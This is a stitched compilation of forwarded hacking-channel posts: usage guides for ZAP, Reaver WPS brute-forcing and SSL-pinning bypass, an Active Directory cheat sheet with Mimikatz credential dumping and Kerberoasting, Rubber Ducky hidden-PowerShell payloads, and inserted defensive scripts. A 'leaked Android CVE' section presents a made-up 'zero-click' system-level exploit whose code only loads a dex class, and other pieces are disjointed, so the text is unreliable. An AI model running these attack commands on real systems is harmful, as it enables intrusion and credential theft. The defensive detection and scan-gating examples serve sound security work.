Forwarded from Exploiting Crew (Pr1vAt3)
Tool: OWASP ZAP - Zed Attack Proxy
OWASP ZAP (Zed Attack Proxy) is an open-source web application security scanner. It is used to identify vulnerabilities in web applications through automated scanning and manual testing. ZAP helps detect issues like SQL injection, cross-site scripting (XSS), and more.
---
### Basic Usage Command:
1. Start OWASP ZAP by running the following command (after installing it):
```shell
zap.sh
```
Explanation:
- `zap.sh`: Launches the OWASP ZAP application from the command line.
---
### Example: Automated Scan Using ZAP's API
```shell
zap-cli quick-scan -u http://example.com
```
Explanation:
- `zap-cli quick-scan`: Initiates a quick scan of the web application.
- `-u http://example.com`: Specifies the target URL to be scanned.
---
### Example: Start ZAP in Headless Mode for Automation
```shell
zap.sh -daemon -port 8080 -host 127.0.0.1
```
Explanation:
- `-daemon`: Starts ZAP in headless (non-GUI) mode, which is suitable for automation.
- `-port 8080`: Sets the port for the ZAP proxy to listen on (default is 8080).
- `-host 127.0.0.1`: Sets the host address to localhost.
---
### Example: Scan with Specific Context
```shell
zap-cli spider -c -u http://example.com
```
Explanation:
- `spider`: Crawls the target website to discover pages.
- `-c`: Continues crawling from any previously discovered URLs.
- `-u http://example.com`: The URL to start the crawl from.
---
### Important Notes:
1. OWASP ZAP is highly customizable and can be extended with a variety of plugins to enhance its functionality.
2. It's great for both beginners and experienced penetration testers, thanks to its automated scanning and manual testing features.
3. Ensure you have authorization to test the application before running ZAP on a target website.
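The headless daemon and the API-driven scan above chain naturally into one automation script. This is an added example, not code from the original post or from the ZAP project: it drives the daemon from the headless example (127.0.0.1:8080) through ZAP's JSON REST API using only the Python standard library, polls the spider and active scan to completion, and then fails the run when any alert reaches a chosen risk level, which is how a team gates a CI pipeline on ZAP findings against its own application. ZAP_API_KEY is a placeholder for the key ZAP prints at startup, and SAMPLE_ALERTS is a constructed reply used when no daemon is reachable.

```python
"""Drive a headless ZAP daemon over its JSON REST API and gate on the results.

Added example (not from the original post). Assumes ZAP is running as
`zap.sh -daemon -port 8080 -host 127.0.0.1`; ZAP_API_KEY is a placeholder.
"""
import json
import time
import urllib.error
import urllib.parse
import urllib.request

ZAP_BASE = "http://127.0.0.1:8080"  # daemon address from the headless example
ZAP_API_KEY = "CHANGE_ME"           # placeholder: ZAP prints the real key at startup
TARGET = "http://example.com"       # the same target URL the post's examples use

RISK_ORDER = {"Informational": 0, "Low": 1, "Medium": 2, "High": 3}

# Constructed sample shaped like ZAP's core/view/alerts reply, used offline.
SAMPLE_ALERTS = [
    {"risk": "Medium", "name": "X-Frame-Options Header Not Set", "url": TARGET},
    {"risk": "High", "name": "Cross Site Scripting (Reflected)", "url": TARGET + "/search"},
    {"risk": "Low", "name": "Cookie Without Secure Flag", "url": TARGET + "/login"},
]


def api_url(component, kind, name, **params):
    """Build a ZAP API URL, e.g. /JSON/spider/action/scan/?url=...&apikey=..."""
    query = dict(params, apikey=ZAP_API_KEY)
    return f"{ZAP_BASE}/JSON/{component}/{kind}/{name}/?" + urllib.parse.urlencode(query)


def call(component, kind, name, **params):
    """Issue one API request and decode the JSON reply."""
    url = api_url(component, kind, name, **params)
    with urllib.request.urlopen(url, timeout=30) as resp:
        return json.loads(resp.read().decode("utf-8"))


def wait_for(component, scan_id, poll_seconds=2):
    """Poll spider/ascan view/status until ZAP reports 100 percent complete."""
    while int(call(component, "view", "status", scanId=scan_id)["status"]) < 100:
        time.sleep(poll_seconds)


def summarize_alerts(alerts):
    """Return (count per risk level, highest risk level seen or None)."""
    counts = {level: 0 for level in RISK_ORDER}
    for alert in alerts:
        level = alert.get("risk")
        if level not in RISK_ORDER:
            level = "Informational"  # unknown levels are counted as Informational
        counts[level] += 1
    present = [level for level, n in counts.items() if n]
    highest = max(present, key=RISK_ORDER.__getitem__) if present else None
    return counts, highest


def fails_gate(alerts, threshold="High"):
    """True when any alert is at or above threshold: the CI pass/fail rule."""
    _, highest = summarize_alerts(alerts)
    return highest is not None and RISK_ORDER[highest] >= RISK_ORDER[threshold]


def run_scan(target=TARGET):
    """Spider, then actively scan, then fetch every alert recorded for the target."""
    spider_id = call("spider", "action", "scan", url=target, recurse="true")["scan"]
    wait_for("spider", spider_id)
    ascan_id = call("ascan", "action", "scan", url=target, recurse="true")["scan"]
    wait_for("ascan", ascan_id)
    return call("core", "view", "alerts", baseurl=target, start="0", count="1000")["alerts"]


if __name__ == "__main__":
    try:
        alerts = run_scan()
    except urllib.error.URLError as exc:
        print(f"ZAP daemon not reachable ({exc}); using constructed sample alerts")
        alerts = SAMPLE_ALERTS
    counts, highest = summarize_alerts(alerts)
    for level in sorted(counts, key=RISK_ORDER.__getitem__, reverse=True):
        print(f"{level:<14}{counts[level]}")
    raise SystemExit(1 if fails_gate(alerts, threshold="High") else 0)
```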
Forwarded from Exploiting Crew (Pr1vAt3)
Tool: SSLUnpinning - SSL Pinning Bypass Tool for Android
SSLUnpinning is a tool designed to bypass SSL pinning on Android applications. SSL pinning is a security technique that prevents man-in-the-middle (MITM) attacks by ensuring that the client only trusts a predefined certificate or public key. SSLUnpinning helps in bypassing this mechanism during security assessments or penetration testing.
---
### Basic Usage Command:
To use SSLUnpinning, you typically need to decompile the APK, patch it, and then recompile it. Here's the general approach:
1. Decompile the APK (using tools like APKTool or jadx):
```shell
apktool d app.apk
```
2. Patch the APK with SSLUnpinning:
- Use the provided SSLUnpinning script or modify the decompiled code to disable SSL pinning manually.
3. Recompile the APK:
```shell
apktool b app -o app_modified.apk
```
4. Sign the APK (to ensure it can be installed on a device):
```shell
jarsigner -verbose -sigalg MD5withRSA -digestalg SHA1 -keystore my-release-key.jks app_modified.apk alias_name
```
5. Install the patched APK:
```shell
adb install app_modified.apk
```
---
### Important Notes:
- SSL Pinning Bypass is useful when testing applications for vulnerabilities but can only be performed if you have authorization to do so.
- Repackaging and patching APKs may break other functionality or be detected by the application if additional protections are in place.
Forwarded from Exploiting Crew (Pr1vAt3)
Tool: Reaver - WPS PIN Brute-Forcing Tool
Reaver is a powerful tool designed to exploit vulnerabilities in Wi-Fi Protected Setup (WPS) to recover the PIN used for authentication in wireless routers. It allows attackers to brute-force the WPS PIN and gain access to the target network.
---
### Basic Usage Command:
```shell
reaver -i wlan0 -b XX:XX:XX:XX:XX:XX -vv
```
Explanation:
- `reaver`: Runs the Reaver tool.
- `-i wlan0`: Specifies the wireless network interface to use (replace wlan0 with your network interface name).
- `-b XX:XX:XX:XX:XX:XX`: Specifies the target router's BSSID (MAC address).
- `-vv`: Enables verbose output to display more information during the attack.
---
### Example: Specify a WPS PIN to Brute-Force
```shell
reaver -i wlan0 -b XX:XX:XX:XX:XX:XX -p 12345670 -vv
```
Explanation:
- `-p 12345670`: Attempts a specific WPS PIN, instead of brute-forcing the entire PIN.
- `-vv`: Provides detailed output for monitoring progress.
---
### Example: Save Results to a File
```shell
reaver -i wlan0 -b XX:XX:XX:XX:XX:XX -vv -o /path/to/output.txt
```
Explanation:
- `-o /path/to/output.txt`: Saves the output to a specified file for later analysis.
---
### Important Notes:
1. Reaver works only on routers with WPS enabled, and the attack may take several hours to complete depending on the router's implementation of WPS.
2. Legal Considerations: Always ensure that you have explicit permission to perform wireless network penetration testing on the target system. Unauthorized use of Reaver is illegal.
Forwarded from Exploiting Crew (Pr1vAt3)
The New Leaked Android CVE:
Android System Server RCE:
The Android System Server is responsible for managing system services and processes. By exploiting a vulnerability in this process, an attacker can execute arbitrary code at the system level.
Deployment and Execution
Build the malicious dex file using the dx tool from the Android SDK:
```shell
dx --dex --output=myexploit.dex myexploit.class
```
Create a new APK that includes the malicious dex file and any required dependencies:
```xml
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.androidexploit">
    <application>
        <activity android:name=".MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
    </application>
</manifest>
```
Sign the APK with a valid signing certificate:
```shell
jarsigner -verbose -keystore mykeystore.keystore SysIntel.apk SysIntell
```
Install the signed APK on a vulnerable device.
Why it Works
The Android System Server is responsible for managing system services and processes, including the package manager. By exploiting a vulnerability in this process, an attacker can execute arbitrary code at the system level, gaining full control over the device.
Custom Zero-Click Exploit: Android Package Manager Service (PackageManagerService)
Create a custom zero-click exploit that targets a vulnerability in the Android Package Manager Service (PackageManagerService). This service is responsible for managing application installations and updates. Your exploit should allow an attacker to execute arbitrary code with system privileges.
Exploit Code
```java
import android.os.Bundle;
import dalvik.system.DexClassLoader;
import java.lang.reflect.Method;

public class MainActivity extends androidx.appcompat.app.AppCompatActivity {
    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.activity_main);
        // Load the dex file bundled in this APK. DexClassLoader takes a single
        // colon-separated path string (not a String[]), and the optimized-output
        // directory must be an app-private directory, not the APK path itself.
        String dexPath = getPackageCodePath();
        DexClassLoader cl = new DexClassLoader(
                dexPath, getCodeCacheDir().getAbsolutePath(), null, getClass().getClassLoader());
        // Invoke the RCE method from the dex file via reflection
        try {
            Method m = cl.loadClass("com.example.malicious.Malware")
                    .getDeclaredMethod("executeRCE", String.class);
            m.invoke(null, "Hello, Android!");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
```
How to Run
Build the malicious dex file using the dx tool from the Android SDK:
```shell
dx --dex --output=myexploit.dex myexploit.class
```
Create a new APK that includes the malicious dex file and any required dependencies.
Sign the APK with a valid signing certificate.
Install the signed APK on a vulnerable device.
Forwarded from Exploiting Crew (Pr1vAt3)
Here are the URLs for the extended list of free proxy sites:
1. CroxyProxy - https://www.croxyproxy.com
2. TurboHide - https://www.turbohide.com
3. VPNBook - https://www.vpnbook.com/webproxy
4. FilterBypass - https://www.filterbypass.me
5. Hidester - https://hidester.com/proxy/
6. Mywebproxy - https://mywebproxy.com/
7. Proxyium - https://proxyium.com
8. Anonymizing - https://anonymizing.com/
9. NetNut - https://www.netnut.io/
10. Plain Proxies - https://www.plainproxies.com/
Forwarded from Exploiting Crew (Pr1vAt3)
Dark Web Websites (Updated):
Forwarded from Exploiting Crew (Pr1vAt3)
If you want to learn CYBERSECURITY for FREE, this THREAD is for you.
Here are loads of FREE RESOURCES (courses, certifications, communities, internship opportunities) to get you STARTED.
1. Cisco CCNA Cyber Ops Associate 200-201 - MEGA: mega.nz/folder/B4A0WDZ…
2. Cybersecurity FULLY LOADED by Simplilearn: https://lnkd.in/eddq3rXW
3. Cybersecurity FULL course by EDUREKA: https://lnkd.in/eK_dZFUi
4. Awesome Cybersecurity University: https://lnkd.in/er-MAK2q
5. Cybersecurity books for beginners: https://lnkd.in/ecBzr_Sn
6. Cybersecurity Documents: https://lnkd.in/ecBzr_Sn
Cyber Security Courses for beginners and professionals
Core:
- Cisco Network Essentials - lnkd.in/eMXxFBPN
- Palo Alto - lnkd.in/ebz4VZmQ
- AWS Cloud - lnkd.in/e_auX7VE
- Azure Cloud - lnkd.in/eCq_dvDq
- GCP Cloud - lnkd.in/eDNWnVsD
Fundamentals:
- SANS Aces - lnkd.in/eNCPrtdd
- ISC(2) Certified in Cyber - lnkd.in/e6jB_6af
- Coursera - lnkd.in/ePMNVDm5
- EC-Council - lnkd.in/ewiVUkYt
- Cyber Security - lnkd.in/eueCSF6A
- Cisco Cyber Induction - lnkd.in/e8C3jacc
- Cisco Cyber Essentials - lnkd.in/eTQNsbyF
- Cisco Network Essentials - lnkd.in/eMXxFBPN
- Palo Alto - lnkd.in/ebz4VZmQ
- Fortinet NSE - lnkd.in/es3c_Q6E
Penetration Testing:
- TCM-Security - lnkd.in/eJQKmhnt
- PortSwigger Web Hacking - lnkd.in/eEa-fNfu
- CodeRed Hacking Essentials - lnkd.in/eJbyZp_9
- RedTeaming - lnkd.in/et_T2DEa
- METASPLOIT UNLEASHED - lnkd.in/eJFcNSsz
- Hacker101 - lnkd.in/eJK5xp2A
Vulnerability Management:
- Qualys - lnkd.in/eDWu2zyT
- Tenable (Intro) - lnkd.in/eQW2Zjjj
- Class Central - lnkd.in/eWbmXfRU
SIEM:
- Splunk - lnkd.in/e5ZVAEuF
- QRadar - lnkd.in/ebjbyq_x
- Elastic - lnkd.in/e-jXsnVs
- XPERT - lnkd.in/eYR7r3uD
Engineering:
- Oxford - lnkd.in/eJHp7Dp2
- IoT Privacy - lnkd.in/eN5xDUed
XXH - Cross-Site Hacking (XXH)
XXH is a tool used for exploiting vulnerabilities in cross-site scripting (XSS) attacks in web applications. It can be used to automate attacks and demonstrate how an attacker can inject malicious scripts into a website.
### Basic Usage Command:
```shell
xxh -u http://example.com
```
Explanation:
- `xxh`: Runs the XXH tool.
- `-u http://example.com`: Specifies the target URL to test for XSS vulnerabilities.
---
### Example: Test for Specific XSS Payloads
```shell
xxh -u http://example.com -p "<script>alert('XSS')</script>"
```
Explanation:
- `-u http://example.com`: Specifies the target URL.
- `-p "<script>alert('XSS')</script>"`: Provides a specific payload to test the application for a potential XSS vulnerability.
---
### Important Notes:
1. Authorization: Always ensure you have explicit permission to test a website for XSS vulnerabilities, as unauthorized testing is illegal.
2. Payloads: XXH can help automate the process of injecting a variety of XSS payloads into vulnerable parameters in web applications.
3. Testing: This tool is best used to identify and demonstrate XSS vulnerabilities, which could allow an attacker to steal sensitive data like cookies, session IDs, or other information.
Forwarded from Exploiting Crew (Pr1vAt3)
Top Free DeepFake Labs:
1. DeepFaceLab
- Overview: One of the most popular open-source deepfake tools, DeepFaceLab allows you to create high-quality deepfake videos, but it requires significant technical skills.
- Features: High level of customization, support for face-swapping, training, and exporting videos.
- Platform: Windows (requires installation).
- Cost: Free (but with a steep learning curve).
[DeepFaceLab GitHub](https://github.com/iperov/DeepFaceLab)
2. FaceSwap
- Overview: Another open-source deepfake tool, FaceSwap offers similar capabilities to DeepFaceLab, with a slightly easier user interface.
- Features: Face swapping, training models, video creation, and a large community for troubleshooting.
- Platform: Windows, Linux, macOS.
- Cost: Free.
[FaceSwap GitHub](https://github.com/deepfakes/faceswap)
3. Zao
- Overview: Zao is a popular deepfake app that lets users swap faces in short video clips. It's quite easy to use and doesn't require any technical expertise.
- Features: Instant face swapping in videos, easy-to-use mobile app.
- Platform: iOS, Android.
- Cost: Free (though there might be in-app purchases or ads).
[Zao on App Store](https://apps.apple.com/us/app/zao/id1468717386)
4. Reface (formerly Doublicat)
- Overview: Reface is a mobile app that allows users to swap faces in GIFs, images, and videos. It provides high-quality face-swapping, making it popular for meme creation.
- Features: Instant face swap in videos, GIFs, and photos.
- Platform: iOS, Android.
- Cost: Free, with a premium version offering additional features.
[Reface on App Store](https://apps.apple.com/us/app/reface/id1480262143)
[Reface on Google Play](https://play.google.com/store/apps/details?id=com.reface.app)
5. DeepArt.io
- Overview: While not specifically for deepfakes, DeepArt.io allows users to transform their photos into stylized artworks using AI. Some users have experimented with face-swapping features.
- Features: AI-based art transformation, face-swapping capabilities.
- Platform: Web.
- Cost: Free for basic features.
[DeepArt.io](https://deepart.io/)
6. FaceApp
- Overview: A very popular app for aging, gender-swapping, and face enhancement. While not a traditional deepfake tool, it leverages AI for impressive transformations of faces in photos.
- Features: Aging, gender swap, facial expressions, makeup, and more.
- Platform: iOS, Android.
- Cost: Free with in-app purchases.
[FaceApp on App Store](https://apps.apple.com/us/app/faceapp/id1180881432)
[FaceApp on Google Play](https://play.google.com/store/apps/details?id=io.faceapp&hl=en&gl=US)
7. MyHeritage Deep Nostalgia
- Overview: A fun tool that animates old photos, bringing them to life by making them appear as if they're moving. It uses deepfake-like technology but focuses on historic photos.
- Features: Animation of photos (facial expressions and movements).
- Platform: Web, iOS, Android.
- Cost: Free trial, but the full functionality may require a subscription.
[MyHeritage Deep Nostalgia](https://www.myheritage.com/deep-nostalgia)
8. Fotor (Deepfake Filters)
- Overview: Fotor offers AI-powered editing tools, including face swapping and other deepfake-style effects, allowing users to alter facial features in photos.
- Features: Face-swapping filters, AI-generated photo enhancements.
- Platform: Web, iOS, Android.
- Cost: Free with premium options.
[Fotor](https://www.fotor.com/)
Important Considerations:
- Ethical Use: Always be cautious when using deepfake tools, as they can be used for harmful purposes such as misinformation, identity theft, or defamation.
- Legal Restrictions: In many regions, the creation and distribution of deepfakes, particularly without consent, may be illegal or lead to legal repercussions.
These websites and apps offer free tools for experimenting with AI-based face manipulation, but they each come with limitations in functionality and output quality.
Forwarded from Exploiting Crew (Pr1vAt3)
Autopsy - Digital Forensics Platform
Autopsy is an open-source digital forensics platform used for analyzing hard drives, smartphones, and other digital storage devices. It provides a user-friendly interface for examining file systems, extracting evidence, and generating forensic reports, making it a valuable tool for investigating cybercrimes and incidents.
---
### Basic Usage Command:
To start Autopsy from the command line:
```shell
autopsy
```
Explanation:
- autopsy: Launches the Autopsy graphical user interface (GUI) for forensic analysis.
---
### Example: Create a New Case
```shell
autopsy -c new_case -d /path/to/image.dd
```
Explanation:
- -c new_case: Creates a new forensic case.
- -d /path/to/image.dd: Specifies the disk image to analyze, which could be a raw disk image, an E01 file, or other supported formats.
---
### Example: Analyze File System and Evidence
Once the case is created, you can use Autopsy to analyze file systems, perform keyword searches, recover deleted files, and generate reports through its GUI. However, you can also perform some basic tasks like viewing the file structure or checking logs from the command line interface (CLI).
---
### Important Notes:
1. Case Handling: Autopsy can be used to handle multiple cases simultaneously, making it efficient for forensic investigations with large amounts of evidence.
2. Extensive Plugin Support: Autopsy supports a wide range of plugins that allow integration with other tools like Sleuth Kit (TSK), a popular set of command-line forensic tools.
3. Legal Considerations: Always make sure you have permission to perform forensic analysis, as unauthorized analysis of digital devices may be illegal.
Forwarded from Exploiting Crew (Pr1vAt3)
Top Hacking gadgets frequently used by cybersecurity professionals, ethical hackers, and enthusiasts, along with their official or well-known sources:
1. Raspberry Pi - A versatile single-board computer used for penetration testing and running tools like Kali Linux.
URL: [www.raspberrypi.com](https://www.raspberrypi.com)
2. WiFi Pineapple - A device for wireless penetration testing, including rogue access points and deauth tests.
URL: [shop.hak5.org](https://shop.hak5.org)
3. HackRF One - A software-defined radio for analyzing and manipulating radio frequencies.
URL: [greatscottgadgets.com](https://greatscottgadgets.com)
4. Ubertooth One - Used for Bluetooth experimentation and packet sniffing.
URL: [greatscottgadgets.com](https://greatscottgadgets.com)
5. Deauther Watch - A wearable device for Wi-Fi deauthentication attacks.
URL: [dstike.com](https://dstike.com)
6. USB Rubber Ducky - A keystroke injection tool that executes predefined attack scripts.
URL: [shop.hak5.org](https://shop.hak5.org)
7. Flipper Zero - A multi-tool for interacting with digital systems like RFID and GPIO debugging.
URL: [flipperzero.one](https://flipperzero.one)
8. ChameleonMini - An RFID emulator for NFC security analysis and penetration testing.
URL: [chameleontiny.com](https://chameleontiny.com)
9. O.MG Cable - A USB cable capable of injecting payloads and acting as a keylogger.
URL: [shop.hak5.org](https://shop.hak5.org)
10. HakCat WiFi Nugget - A tool for learning Wi-Fi hacking with a playful design.
URL: [github.com/HakCat](https://github.com/HakCat)
11. Hardware Keylogger - A physical device for recording keystrokes.
URL: [keydemon.com](https://keydemon.com)
12. LAN Turtle - A covert hacking tool disguised as a USB-to-Ethernet adapter.
URL: [shop.hak5.org](https://shop.hak5.org)
13. Proxmark3 - Used for RFID research, cloning, and penetration testing.
URL: [proxmark.org](https://proxmark.org)
14. Rubber Glove (Covert Device) - A disguised tool for capturing sensitive information.
URL: Search online for specific retailers.
Let me know if you'd like an extended list or details about a specific gadget!
Forwarded from Exploiting Crew (Pr1vAt3)
Active Directory Exploitation Cheat Sheet - AD Enumeration and Exploitation
The Active Directory Exploitation Cheat Sheet by [S1ckB0y1337](https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet) is a comprehensive collection of enumeration and attack methods for Windows Active Directory environments. This resource is ideal for penetration testers and red teamers focusing on AD security.
---
### GitHub Repository:
[Active Directory Exploitation Cheat Sheet](https://github.com/S1ckB0y1337/Active-Directory-Exploitation-Cheat-Sheet)
---
### Commands and Usage Examples:
#### 1. Domain Enumeration
Using PowerView:
```powershell
# Get current domain details
Get-Domain
# Enumerate domain users
Get-DomainUser | Out-File -FilePath .\DomainUsers.txt
# Enumerate domain controllers
Get-DomainController
```
---
#### 2. Lateral Movement
Using PowerShell Remoting:
```powershell
# Enable remoting
Enable-PSRemoting -Force
# Invoke a remote command
Invoke-Command -ComputerName <TargetComputer> -ScriptBlock {Get-Process}
```
---
#### 3. Privilege Escalation
Using Kerberoasting:
```powershell
# Find SPNs for Kerberoasting
Get-DomainUser -SPN
```
The service tickets requested for these SPNs can then be cracked offline with tools like Rubeus or Hashcat.
---
#### 4. Credential Dumping
Using Mimikatz:
```
# Launch Mimikatz
mimikatz.exe
# Dump credentials
privilege::debug
lsadump::sam
```
---
### Popular Features:
1. User Hunting: Locate where privileged users have active sessions:
```powershell
Find-DomainUserLocation
```
2. Enumeration of Group Policies:
```powershell
Get-DomainGPO | Sort-Object -Property DisplayName
```
3. Abusing ACLs for Privilege Escalation:
```powershell
Get-DomainObjectAcl -Identity <AccountName> -ResolveGUIDs
```
---
### Notable Tools Integrated:
- PowerView: Active Directory enumeration.
- BloodHound: AD attack path analysis.
- Mimikatz: Credential dumping.
- Impacket: Exploitation toolkit.
---
### Key Use Cases:
1. Enumeration: Map out users, computers, and domain trust relationships.
2. Privilege Escalation: Exploit Kerberoasting, constrained delegation, or DNSAdmins.
3. Lateral Movement: Execute remote commands and pivot across systems.
4. Persistence: Set up Golden Tickets or Skeleton Keys.
This cheat sheet is an essential resource for systematically targeting and exploiting Active Directory. Use it responsibly and within legal boundaries!
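The Kerberoasting step above (enumerating SPN accounts, then requesting their service tickets) leaves a footprint in the domain controller's Security log. As an added example that is not part of the cheat sheet, the Python below flags that pattern in Event ID 4769 records: RC4 (encryption type 0x17) ticket requests for several user service accounts from one principal. The event records, the domain names and the threshold are constructed assumptions for illustration; field names follow the 4769 event data.

```python
"""Flag likely Kerberoasting activity in Windows Security log events.

Added example, not part of the cheat sheet. It scans Event ID 4769
(Kerberos service ticket requested) records for successful TGS requests
that use RC4 (TicketEncryptionType 0x17) against user service accounts.
Records are constructed here in a simplified dict form; in practice they
come from the event log or a SIEM export.
"""
from collections import defaultdict

RC4_HMAC = "0x17"      # RC4 ticket encryption; AES tickets are 0x11 / 0x12
KRB_SUCCESS = "0x0"    # Status 0x0 means the ticket was issued

# Constructed sample events (keys mirror the 4769 event data field names).
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "CORP-DC01$",
     "TicketEncryptionType": "0x12", "IpAddress": "::ffff:10.0.0.21", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.55", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "svc_backup",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.55", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "svc_web",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.55", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "bob@CORP.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.55", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "carol@CORP.LOCAL", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.77", "Status": "0x0"},
    {"EventID": 4768, "TargetUserName": "dave@CORP.LOCAL", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "IpAddress": "::ffff:10.0.0.90", "Status": "0x0"},
]


def is_rc4_service_ticket(event):
    """True for a successful 4769 RC4 TGS request to a user service account.

    Computer accounts (names ending in $) and krbtgt are excluded: RC4
    traffic to them is routine noise and not what roasting targets.
    """
    if event.get("EventID") != 4769 or event.get("Status") != KRB_SUCCESS:
        return False
    svc = event.get("ServiceName", "")
    if svc.endswith("$") or svc.lower().startswith("krbtgt"):
        return False
    return event.get("TicketEncryptionType", "").lower() == RC4_HMAC


def find_kerberoast_suspects(events, min_distinct_services=2):
    """Group RC4 TGS requests by (requesting user, source IP).

    Returns {(user, ip): sorted service names} for every pair that asked
    for RC4 tickets to at least min_distinct_services distinct accounts.
    One RC4 ticket may be a legacy client; many distinct service accounts
    from a single principal is the roasting signature. A production rule
    would additionally bound this to a time window.
    """
    by_requester = defaultdict(set)
    for ev in events:
        if is_rc4_service_ticket(ev):
            by_requester[(ev["TargetUserName"], ev["IpAddress"])].add(ev["ServiceName"])
    return {key: sorted(svcs) for key, svcs in by_requester.items()
            if len(svcs) >= min_distinct_services}


if __name__ == "__main__":
    for (user, ip), services in find_kerberoast_suspects(SAMPLE_EVENTS).items():
        print(f"[!] {user} from {ip} requested RC4 tickets for: {', '.join(services)}")
```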
Forwarded from Exploiting Crew (Pr1vAt3)
USB Rubber Ducky Payload
The [USB Rubber Ducky Payload Repository](https://github.com/hak5/usbrubberducky-payloads) by Hak5 provides a collection of ready-to-use payloads for the USB Rubber Ducky, a keystroke injection tool often used for penetration testing and red teaming. These payloads simulate fast and stealthy input for various exploits and tasks.
---
### GitHub Repository:
[Hak5 USB Rubber Ducky Payloads](https://github.com/hak5/usbrubberducky-payloads)
---
### Example Payload Structure:
#### Payload Documentation
All payloads start with comments that describe their purpose, author, target, and configuration.
```
REM Title: Example Payload
REM Author: Korben Dallas
REM Description: Opens hidden PowerShell
REM Target: Windows 10
REM Props: Hak5, Darren Kitchen
REM Version: 1.0
REM Category: General
```
---
#### Payload Example: URL Opening Script
This payload opens a URL after a brief delay.
```
REM BEGINNING OF PAYLOAD
REM CONFIGURATION
REM REQUIRED - Provide URL
DEFINE #MY_TARGET_URL example.com
REM OPTIONAL - Set boot delay; default is 5 seconds
DEFINE #BOOT_DELAY 5000
DELAY #BOOT_DELAY
STRING start chrome.exe #MY_TARGET_URL
ENTER
```
---
### Features:
1. Preconfigured Payloads:
- Password exfiltration
- Reverse shells
- Network reconnaissance
- Drive-by downloads
2. Customizable Payloads:
- DEFINE statements for reusable parameters.
- DELAY statements to time operations precisely.
3. Cross-Platform Targeting:
- Payloads can be customized for Windows, macOS, and Linux.
---
### Key Payload Categories:
1. Information Gathering:
- Automated reconnaissance.
- Exporting network details.
2. Exploitation:
- Privilege escalation.
- Exploiting vulnerabilities via automated commands.
3. Post-Exploitation:
- Extracting data or installing backdoors.
4. Social Engineering:
- Simulating user activity or spoofing actions.
---
### Notable Use Case:
#### Hidden PowerShell Script Execution
```
REM Title: Hidden PowerShell Execution
REM Author: Hak5
REM Description: Launches a hidden PowerShell instance.
REM Target: Windows 10
REM Category: Post-Exploitation
DELAY 5000
STRING powershell -windowstyle hidden
ENTER
```
---
### Usage:
1. Select a payload from the repository.
2. Edit the payload as per your target's configuration.
3. Load the payload onto the USB Rubber Ducky.
4. Deploy and execute the payload by plugging it into the target system.
This repository is a must-have for penetration testers aiming to automate tasks, test security defenses, or explore advanced attack vectors. Ensure proper authorization when using these tools.
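The payload structure above (REM header, DEFINE constants, DELAY timing, STRING/ENTER keystrokes) is simple enough to audit statically. As an added example that is not code from the Hak5 repository, the Python below parses that DuckyScript subset, resolves the #CONSTANTS, totals the scripted delay and reports exactly what the payload would type, so a payload can be reviewed, or a recovered one triaged, without ever running it. The sample payload is a constructed copy of the URL-opening script; the required header fields are an assumption based on the documentation convention shown.

```python
"""Static review of a DuckyScript payload without executing it.

Added example, not part of the Hak5 repository. It handles the DuckyScript
commands used by the payloads above (REM, DEFINE, DELAY, STRING, STRINGLN,
ENTER), expands #CONSTANTS, and reports header metadata, total delay,
the typed text, and anything suspicious such as undefined constants.
"""
import re

# Header fields the repository's payload documentation convention carries.
REQUIRED_HEADER = ("Title", "Author", "Description", "Target")

# Constructed copy of the URL-opening payload shown above.
SAMPLE_PAYLOAD = """\
REM Title: Example Payload
REM Author: Korben Dallas
REM Description: Opens a URL after a boot delay
REM Target: Windows 10
REM CONFIGURATION
REM REQUIRED - Provide URL
DEFINE #MY_TARGET_URL example.com
REM OPTIONAL - Set boot delay; default is 5 seconds
DEFINE #BOOT_DELAY 5000
DELAY #BOOT_DELAY
STRING start chrome.exe #MY_TARGET_URL
ENTER
"""


def analyze_payload(text):
    """Return {'header', 'defines', 'delay_ms', 'typed', 'issues'} for a payload."""
    header, defines, typed, issues = {}, {}, [], []
    delay_ms = 0
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        cmd, _, arg = line.partition(" ")
        if cmd == "REM":
            # Only "REM Field: value" lines count as header metadata.
            m = re.match(r"(\w+):\s*(.*)", arg)
            if m and m.group(1) in REQUIRED_HEADER:
                header[m.group(1)] = m.group(2)
        elif cmd == "DEFINE":
            name, _, value = arg.partition(" ")
            defines[name] = value
        elif cmd in ("DELAY", "STRING", "STRINGLN"):
            def substitute(m):
                # An undefined #NAME means the payload would type it literally.
                if m.group(0) not in defines:
                    issues.append(f"line {lineno}: undefined constant {m.group(0)}")
                    return m.group(0)
                return defines[m.group(0)]
            expanded = re.sub(r"#\w+", substitute, arg)
            if cmd == "DELAY":
                if expanded.isdigit():
                    delay_ms += int(expanded)
                else:
                    issues.append(f"line {lineno}: non-numeric DELAY {expanded!r}")
            else:
                typed.append(expanded + ("\n" if cmd == "STRINGLN" else ""))
        elif cmd == "ENTER":
            typed.append("\n")
        else:
            issues.append(f"line {lineno}: unrecognised command {cmd!r}")
    for field in REQUIRED_HEADER:
        if field not in header:
            issues.append(f"missing 'REM {field}:' header line")
    return {"header": header, "defines": defines, "delay_ms": delay_ms,
            "typed": "".join(typed), "issues": issues}


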